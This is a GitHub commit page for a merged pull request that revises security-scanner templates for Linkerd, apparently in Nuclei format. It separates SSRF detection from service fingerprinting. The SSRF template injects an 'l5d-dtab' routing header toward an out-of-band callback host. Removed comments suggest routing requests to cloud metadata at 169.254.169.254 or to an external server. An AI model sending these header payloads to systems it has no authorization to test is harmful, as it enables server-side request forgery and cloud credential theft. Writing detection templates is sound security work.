Merge pull request #2175 from shelld3v/patch-5

Fix false positive
patch-1
Sandeep Singh 2021-07-25 15:25:02 +05:30 committed by GitHub
commit c4fa0a9715
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 39 additions and 53 deletions

View File

@ -1,67 +1,21 @@
id: linkerd-ssrf-detect
# Detect the Linkerd service by overriding the delegation table and
# inspect the response for:
# - a "Via: .. linkerd .."
# - a "l5d-err" and/or a "l5d-success" header
# - a verbose timeout error (binding timeout)
# - a full response
# The full-response case indicates a possible SSRF condition, the others
# only indicates the service presence.
#
# If a full-response is returned you should really manually probe requests with
# the following header values:
#
# - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts
# - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata
id: linkerd-ssrf-detection
info:
name: Linkerd SSRF detection
author: dudez
severity: info
tags: ssrf,linkerd
severity: high
tags: ssrf,linkerd,oob
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
matchers-condition: or
matchers:
- type: regex
name: via-linkerd-present
regex:
- '(?mi)^Via\s*?:.*?linkerd.*$'
part: header
- type: regex
name: l5d-err-present
regex:
- '(?mi)^l5d-err:.*$'
part: header
- type: regex
name: l5d-success-class-present
regex:
- '(?mi)^l5d-success-class: 0.*$'
part: header
- type: word
name: ssrf-response-body
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- '<p>This domain is for use in illustrative examples in documents.'
part: body
- type: regex
name: resolve-timeout-error-present
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
part: body
- type: regex
name: dynbind-error-present
regex:
- '(?mi)exceeded .*? to unspecified while dyn binding'
part: body
- "http"

View File

@ -0,0 +1,32 @@
id: linkerd-service-detect
info:
name: Linkerd Service detection
author: dudez
severity: info
tags: tech,linkerd
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
l5d-dtab: /svc/* => /$/inet/example.com/443
matchers-condition: or
matchers:
- type: regex
regex:
- '(?mi)^l5d-err:.*$'
- '(?mi)^l5d-success-class: 0.*$'
- '(?mi)^Via\s*?:.*?linkerd.*$'
part: header
condition: or
- type: regex
regex:
- '(?mi)Exceeded .*? binding timeout while resolving name'
- '(?mi)exceeded .*? to unspecified while dyn binding'
part: body
condition: or